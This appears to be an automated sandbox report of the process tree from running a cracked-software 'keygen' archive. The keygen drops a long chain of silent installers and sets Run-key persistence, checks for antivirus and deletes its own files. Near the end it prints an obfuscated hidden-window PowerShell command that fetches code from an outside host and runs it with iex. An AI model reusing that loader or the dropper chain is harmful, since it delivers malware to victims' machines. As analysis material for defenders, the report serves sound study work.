"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5836 /prefetch:8
2⤵
PID:4736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8
2⤵
PID:4792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
2⤵
PID:4928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:8
2⤵
PID:5112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4244 /prefetch:8
2⤵
PID:5044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5740 /prefetch:8
2⤵
PID:2244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4736 /prefetch:8
2⤵
PID:1816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5372 /prefetch:8
2⤵
PID:1908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:8
2⤵
PID:1556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3860 /prefetch:8
2⤵
PID:4612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5416 /prefetch:8
2⤵
PID:4512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
2⤵
PID:4648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3656 /prefetch:8
2⤵
PID:4672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3420 /prefetch:8
2⤵
PID:4740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3920 /prefetch:8
2⤵
PID:2428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3996 /prefetch:8
2⤵
PID:4684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8
2⤵
PID:4868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3628 /prefetch:8
2⤵
PID:4484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
2⤵
PID:4420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3836 /prefetch:8
2⤵
PID:5004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3516 /prefetch:8
2⤵
PID:4996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3480 /prefetch:8
2⤵
PID:5060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4920 /prefetch:8
2⤵
PID:2268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5180 /prefetch:8
2⤵
PID:5020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3920 /prefetch:8
2⤵
PID:996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
2⤵
PID:4136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:8
2⤵
PID:4316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
2⤵
PID:4608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:8
2⤵
PID:1344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5116 /prefetch:8
2⤵
PID:4628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3600 /prefetch:8
2⤵
PID:4644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3608 /prefetch:8
2⤵
PID:4784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
2⤵
PID:4800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:8
2⤵
PID:4788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3668 /prefetch:8
2⤵
PID:4684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6000 /prefetch:8
2⤵
PID:4988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:8
2⤵
PID:3804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
2⤵
PID:4128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4004 /prefetch:8
2⤵
PID:5028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3516 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1016 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8
2⤵
PID:4504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:8
2⤵
PID:3760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:8
2⤵
PID:5116

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2788

C:\Users\Admin\AppData\Local\Temp\Temp2_Carbide.UI.Theme.Edition.keygen.by.Lz0.zip\Carbide.UI.Theme.Edition.keygen.by.Lz0.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_Carbide.UI.Theme.Edition.keygen.by.Lz0.zip\Carbide.UI.Theme.Edition.keygen.by.Lz0.exe"
1⤵
PID:4524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:4832

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
4⤵
- Executes dropped EXE
PID:5096

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:2432

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:1812

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4860

C:\Users\Admin\AppData\Roaming\A019.tmp.exe
"C:\Users\Admin\AppData\Roaming\A019.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4520

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\A019.tmp.exe"
5⤵
PID:5616

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:5444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
4⤵
PID:4812

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4176

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:4780

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:2344

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4692

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:4732

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe" 1 3.1617573975.606a385752eca 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3136

C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe" 2 3.1617573975.606a385752eca
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
PID:4420

C:\Users\Admin\AppData\Local\Temp\3ilzcpjnxmg\px23tnqd4ls.exe
"C:\Users\Admin\AppData\Local\Temp\3ilzcpjnxmg\px23tnqd4ls.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:1844

C:\Users\Admin\AppData\Local\Temp\is-BET6E.tmp\px23tnqd4ls.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BET6E.tmp\px23tnqd4ls.tmp" /SL5="$C005C,2592217,780800,C:\Users\Admin\AppData\Local\Temp\3ilzcpjnxmg\px23tnqd4ls.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5116

C:\Users\Admin\AppData\Local\Temp\is-RLUN9.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-RLUN9.tmp\winlthsth.exe"
10⤵
PID:5848

C:\Users\Admin\AppData\Local\Temp\rKVHIYcDe.exe
"C:\Users\Admin\AppData\Local\Temp\rKVHIYcDe.exe"
11⤵
PID:580

C:\Windows\SysWOW64\at.exe
"C:\Windows\System32\at.exe"
12⤵
PID:1824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
12⤵
PID:5140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe
13⤵
PID:4772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:7940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\5xs4k0chqm3\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\5xs4k0chqm3\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
PID:4156

C:\Users\Admin\AppData\Local\Temp\is-IRFOU.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IRFOU.tmp\Setup3310.tmp" /SL5="$901C0,138429,56832,C:\Users\Admin\AppData\Local\Temp\5xs4k0chqm3\Setup3310.exe" /Verysilent /subid=577
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5104

C:\Users\Admin\AppData\Local\Temp\is-8QFUQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-8QFUQ.tmp\Setup.exe" /Verysilent
10⤵
PID:2416

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
11⤵
PID:4208

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
11⤵
PID:4220

C:\Users\Admin\AppData\Local\Temp\is-DEDAN.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DEDAN.tmp\LabPicV3.tmp" /SL5="$40420,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
12⤵
PID:2480

C:\Users\Admin\AppData\Local\Temp\is-6SGPI.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-6SGPI.tmp\ppppppfy.exe" /S /UID=lab214
13⤵
PID:6996

C:\Program Files\Internet Explorer\ZEHBBSKTOR\prolab.exe
"C:\Program Files\Internet Explorer\ZEHBBSKTOR\prolab.exe" /VERYSILENT
14⤵
PID:6676

C:\Users\Admin\AppData\Local\Temp\is-NR062.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NR062.tmp\prolab.tmp" /SL5="$50408,575243,216576,C:\Program Files\Internet Explorer\ZEHBBSKTOR\prolab.exe" /VERYSILENT
15⤵
PID:6196

C:\Users\Admin\AppData\Local\Temp\b5-9dcb7-2e4-bed86-8f36331d896d6\Dycuhowaefu.exe
"C:\Users\Admin\AppData\Local\Temp\b5-9dcb7-2e4-bed86-8f36331d896d6\Dycuhowaefu.exe"
14⤵
PID:4452

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qszlqpix.h12\md6_6ydj.exe & exit
15⤵
PID:7852

C:\Users\Admin\AppData\Local\Temp\qszlqpix.h12\md6_6ydj.exe
C:\Users\Admin\AppData\Local\Temp\qszlqpix.h12\md6_6ydj.exe
16⤵
PID:2444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kh5gfex.edk\askinstall31.exe & exit
15⤵
PID:6528

C:\Users\Admin\AppData\Local\Temp\0kh5gfex.edk\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\0kh5gfex.edk\askinstall31.exe
16⤵
PID:7952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe & exit
15⤵
PID:7496

C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe
16⤵
PID:7936

C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe
17⤵
PID:7540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chrw3ftx.5jf\GcleanerWW.exe /mixone & exit
15⤵
PID:4700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4dmzkucd.hyw\setup_10.2_mix.exe & exit
15⤵
PID:5152

C:\Users\Admin\AppData\Local\Temp\4dmzkucd.hyw\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\4dmzkucd.hyw\setup_10.2_mix.exe
16⤵
PID:5268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbwdqbtq.b0e\file.exe & exit
15⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\qbwdqbtq.b0e\file.exe
C:\Users\Admin\AppData\Local\Temp\qbwdqbtq.b0e\file.exe
16⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
17⤵
PID:6448

C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
18⤵
PID:8960

C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe" 1 3.1617574286.606a398e5def6 101
19⤵
PID:7884

C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe" 2 3.1617574286.606a398e5def6
20⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\xt31fek5fyn\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\xt31fek5fyn\cpyrix.exe" /VERYSILENT
21⤵
PID:10044

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
22⤵
PID:9444

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
23⤵
PID:9176

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
22⤵
PID:1132

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
23⤵
PID:8892

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
23⤵
PID:8368

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
23⤵
PID:7748

C:\Users\Admin\AppData\Local\Temp\0ohs5owl2av\dnvk3slcewa.exe
"C:\Users\Admin\AppData\Local\Temp\0ohs5owl2av\dnvk3slcewa.exe" /ustwo INSTALL
21⤵
PID:10100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "dnvk3slcewa.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0ohs5owl2av\dnvk3slcewa.exe" & exit
22⤵
PID:9756

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "dnvk3slcewa.exe" /f
23⤵
- Kills process with taskkill
PID:4784

C:\Users\Admin\AppData\Local\Temp\a0352u2phsl\vict.exe
"C:\Users\Admin\AppData\Local\Temp\a0352u2phsl\vict.exe" /VERYSILENT /id=535
21⤵
PID:7300

C:\Users\Admin\AppData\Local\Temp\rcnm1ul0w3m\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\rcnm1ul0w3m\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:9280

C:\Users\Admin\AppData\Local\Temp\3diect4u4jk\app.exe
"C:\Users\Admin\AppData\Local\Temp\3diect4u4jk\app.exe" /8-23
21⤵
PID:10180

